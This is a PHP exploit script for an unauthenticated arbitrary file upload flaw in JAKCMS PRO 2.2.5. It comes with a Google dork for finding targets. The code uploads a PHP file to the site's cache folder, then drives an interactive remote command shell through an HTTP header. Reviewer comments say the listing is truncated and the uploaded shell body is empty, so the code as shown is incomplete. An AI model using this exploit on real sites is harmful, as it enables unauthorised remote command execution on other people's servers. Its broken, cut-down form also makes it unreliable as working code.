# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
# Google Dork: "Powered By JAKCMS"
# Date: 21/09/2011
# Author: EgiX
# Software Link: http://www.jakcms.com/
# Version: 2.2.5
# Tested on: Windows 7 and Debian 6.0.2
#
# Proof-of-concept: abuses an unauthenticated upload handler in the
# jakadminexplorer editor plugin to drop a PHP file under cache/ and then
# drives it as a command shell over an HTTP request header.
#
# NOTE(review): this listing is cut. The PHP open tag, the http_send() and
# RC4() helpers used below, and the head of the usage block (the string whose
# tail is the next statement) are outside this view; nothing about their
# behaviour or the RC4 key is asserted here.
\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /jakcms/\n"; die(); }

// Target host and web root path, taken verbatim from the command line
// (e.g. "localhost" and "/jakcms/"). No validation is visible in this view.
$host = $argv[1];
$path = $argv[2];

// Step 1: plain GET of the web root, only to harvest a PHPSESSID cookie.
$packet  = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

// The preg_match() result is not checked: if the response carries no
// PHPSESSID cookie, $m[1] is undefined and the upload is sent with an
// empty session id. A practitioner would test the match and bail out.
preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);
$sid = $m[1];

// Step 2: multipart body for the upload handler.
//   edit1  = ".php"  -> extension the handler is asked to append
//   input1 = file "foo"
// The file body sent for "input1" is the bare "\r\n" below, i.e. empty as
// shown. Step 3 expects the uploaded script to answer a "Cmd:" header with
// output containing "_code_", which an empty file cannot do — the PHP stub
// was most likely stripped when this page was extracted. Confirm against
// the original advisory before relying on this listing.
$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";
$payload .= "\r\n";
$payload .= "--o0oOo0o--\r\n";

// The plugin's "get" query parameter is an RC4-encrypted, hex-encoded
// query string. Here it asks for upload_filetype=php and a destination
// of {$path}cache/sh; combined with edit1 the resulting file is presumably
// cache/sh.php (the path fetched in step 3). The key lives inside RC4(),
// which is outside this view.
$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));

$packet  = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

// Failure detection is a bare substring match on "Error" anywhere in the
// response; a successful upload whose page happens to contain that word
// would be reported as failed, and vice versa.
if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");

// Step 3: request template for the dropped file. "%s" is filled by
// sprintf() with the base64 command. Note that the whole packet, including
// the user-supplied $path, is used as the sprintf format string, so a path
// containing "%" would be mangled.
$packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

// Interactive loop: one command per line until the literal "exit".
// NOTE(review): on EOF fgets() returns false, trim(false) is "", which is
// never "exit", so a closed stdin spins here sending empty commands.
// NOTE(review): nothing removes cache/sh.php from the target; on an
// authorised engagement clean it up by hand once finished.
while(1)
{
    print "\njakcms-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    // Everything after the "_code_" marker in the response is the command
    // output; a response without the marker aborts the shell.
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

?>